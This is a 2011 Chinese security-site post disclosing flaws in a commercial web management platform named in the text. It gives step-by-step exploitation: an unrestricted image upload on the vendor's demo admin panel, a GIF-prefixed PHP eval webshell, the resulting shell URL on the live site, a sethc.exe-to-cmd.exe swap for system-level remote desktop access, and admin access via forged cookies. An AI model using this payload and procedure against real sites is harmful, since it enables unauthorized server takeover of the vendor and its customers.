首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
掏帝管理平台安全漏洞
来源:vfocus.net 作者:路人甲 发布时间:2011-06-30  

官网:http://www.taodisoft.com/

1、演示站后台竟然有一个地方可上传图片,没有禁止上传。
2、上传图片简单过滤,很容易突破,上传php文件,并能执行。
3、服务器(vps)配置严重低级,拿到webshell之后直接是系统权限,windows系统,替换sethc.exe,直接远程桌面连接即可。
4、其所销售的源代码同样存在此上传漏洞。
5、其所销售的源代码还存在伪造cookie直接进入后台漏洞。所以其所销售的源代码网站后台路径不改,可直接修改cookie进入后台,插入一句话木马或者直接上传可执行文件,拿到webshell。

 

上传地址是:后台-首页配置-分类产品-下面图片上传



直接构造shell.php文件代码

GIF89A

<?php @eval($_POST['pass']);?>

 

上传即可得到shell,地址是:http://pro.taodisoft.com/img/index/shell.php

拿到webshell之后就是系统权限了。。。。。。。



把sethc.exe替换成cmd.exe


 

BY:路人甲


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·某企业站系统SQL注入批量拿shell
·Discuz! X2 SQL注射漏洞,支持Un
·InnovaStudio WYSIWYG Editor 3.
·风讯 4.0之前所有版本通杀拿SHEL
·vBseo(百度推广)远程执行漏洞
·易通企业网站最新0DAY漏洞
·Nuclear-Blog v4.0 留言板的 XSS
·Modoer 1.2.5 注入0day
·网奇CWMS企业网站管理系统3.0编
·dedecms 5.6 RSS订阅页面注入漏
·DeDecms xss 通杀0day 附getshel
·PJBlog3 V3.2.8.352文件Action.a
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved